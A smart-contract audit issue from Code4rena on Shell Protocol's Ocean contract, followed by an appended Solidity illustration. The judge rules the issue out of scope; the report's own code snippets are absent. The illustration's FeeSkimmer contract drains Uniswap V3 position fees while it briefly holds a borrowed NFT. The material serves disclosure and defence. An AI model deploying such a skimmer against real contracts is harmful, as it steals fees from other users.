Closed c4-bot-6 closed 10 months ago
raymondfam marked the issue as sufficient quality report
raymondfam marked the issue as primary issue
May be OOS since all possible attack paths should be directed to the in-scope Curve adapters.
viraj124 (sponsor) disputed
viraj124 marked the issue as disagree with severity
This would come under the category of malicious adapters we mentioned in the known issues. Once we allow adapters to be deployed in a permissionless way, users are responsible for interacting with these types of malicious primitives, so I would mark this as QA at best.
0xA5DF marked the issue as unsatisfactory: Out of scope
It was mentioned that malicious adapters are out of scope, but this implementation allows harming not the caller but other users.
I agree with the sponsor; I don't see why this should be an exception to the known issue.
Lines of code
https://github.com/code-423n4/2023-11-shellprotocol/blob/485de7383cdf88284ee6bcf2926fb7c19e9fb257/src/ocean/Ocean.sol#L745
Vulnerability details
The Ocean contract allows flash-loaning any tokens that were transferred to the Ocean contract. For example, this interaction allows `adapter` to use `wrappedToken` in any way, provided it returns them afterward:

It might be fine for some tokens, but not in general. Some tokens have utility functions that should be accessible only to the owners of the tokens: governance, membership, or economic features of the token. For example, the owner of a Uniswap V3 position can claim its fees, and this function should not be accessible to everyone. The current implementation of the Ocean allows anyone to use these functions.
Impact
Anyone can use the utility functions of any tokens owned by the `Ocean`.
Proof of Concept
To illustrate this, let's consider the following implementation of a malicious adapter. It was mentioned that malicious adapters are out of scope, but this implementation allows harming not the caller but other users. This adapter basically allows collecting Uniswap V3 fees without the owner's permission.
The test below illustrates that anyone can claim Uniswap V3 fees without the owner's permission.
Tools Used
Manual Review
Recommended Mitigation Steps
Consider informing users that any tokens that have utility functions should not be wrapped using the `Ocean` contract.
Assessed type
Other
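As an added illustration of the pattern the report describes (this is not code from the report, from the Ocean, or from Shell Protocol): the hypothetical `TokenLender` stands in for a contract that holds wrapped tokens on behalf of many users and hands one to a primitive for the duration of a call, checking only that the token comes back. `FeeSkimmer` is a hypothetical malicious primitive. The `collect` function and its `CollectParams` struct are the real Uniswap V3 `NonfungiblePositionManager` interface, which only requires that `msg.sender` be the current owner of, or approved for, the position, so whoever holds the NFT at that moment can drain its accrued fees.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hypothetical illustration of the "borrowed token can call owner-only utility
// functions" issue. TokenLender and FeeSkimmer are invented for this example;
// the position-manager interface matches Uniswap V3's NonfungiblePositionManager.

interface IERC721 {
    function ownerOf(uint256 tokenId) external view returns (address);
    function transferFrom(address from, address to, uint256 tokenId) external;
}

interface INonfungiblePositionManager is IERC721 {
    struct CollectParams {
        uint256 tokenId;
        address recipient;
        uint128 amount0Max;
        uint128 amount1Max;
    }

    // Gated on the caller being the owner/approved of tokenId, nothing else.
    function collect(CollectParams calldata params)
        external
        payable
        returns (uint256 amount0, uint256 amount1);
}

interface IBorrower {
    function onTokenLoan(address token, uint256 tokenId) external;
}

// Hypothetical holder of wrapped NFTs for many users. It lends a token to a
// primitive for one call and only verifies that ownership is restored.
contract TokenLender {
    function lend(address token, uint256 tokenId, address borrower) external {
        IERC721(token).transferFrom(address(this), borrower, tokenId);
        IBorrower(borrower).onTokenLoan(token, tokenId);
        // This check passes even though the position's fees are gone.
        require(IERC721(token).ownerOf(tokenId) == address(this), "token not returned");
    }
}

// Hypothetical malicious primitive: while it is the owner of the position it
// collects every accrued fee to its deployer, then hands the NFT back intact.
contract FeeSkimmer is IBorrower {
    address public immutable beneficiary;

    constructor() {
        beneficiary = msg.sender;
    }

    function onTokenLoan(address token, uint256 tokenId) external override {
        INonfungiblePositionManager pm = INonfungiblePositionManager(token);

        // Allowed because this contract is the current owner of tokenId.
        pm.collect(
            INonfungiblePositionManager.CollectParams({
                tokenId: tokenId,
                recipient: beneficiary,
                amount0Max: type(uint128).max,
                amount1Max: type(uint128).max
            })
        );

        // Return the NFT so the lender's ownership check succeeds.
        pm.transferFrom(address(this), msg.sender, tokenId);
    }
}
```

Note the caveat for anyone trying to detect this from the lending side: comparing `ownerOf` before and after the call says nothing about side effects, and even comparing `positions(tokenId).tokensOwed0/1` is unreliable, because `collect` settles the position's uncollected fee growth and zeroes those counters within the same call. The only robust option is the one the report recommends: do not lend out tokens whose ownership confers privileges.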